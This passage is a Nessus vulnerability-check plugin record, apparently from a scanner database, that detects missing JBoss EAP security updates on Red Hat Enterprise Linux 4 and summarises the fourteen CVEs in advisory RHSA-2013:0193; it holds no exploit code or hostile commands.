"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas", "p-cpe:/a:redhat:enterprise_linux:jbossas-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq", "p-cpe:/a:redhat:enterprise_linux:jbossas-messaging", "p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:netty", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2013-0193.NASL", "href": "https://www.tenable.com/plugins/nessus/64080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0193. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64080);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0193\");\n\n script_name(english:\"RHEL 4 : JBoss EAP (RHSA-2013:0193)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Application Platform 5.2.0 packages that fix\nmultiple security issues, various bugs, and add several enhancements\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Application Platform 5.1.2, and\nincludes bug fixes and enhancements. Refer to the JBoss Enterprise\nApplication Platform 5.2.0 Release Notes for information on the most\nsignificant of these changes. The Release Notes will be available\nshortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0193\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red 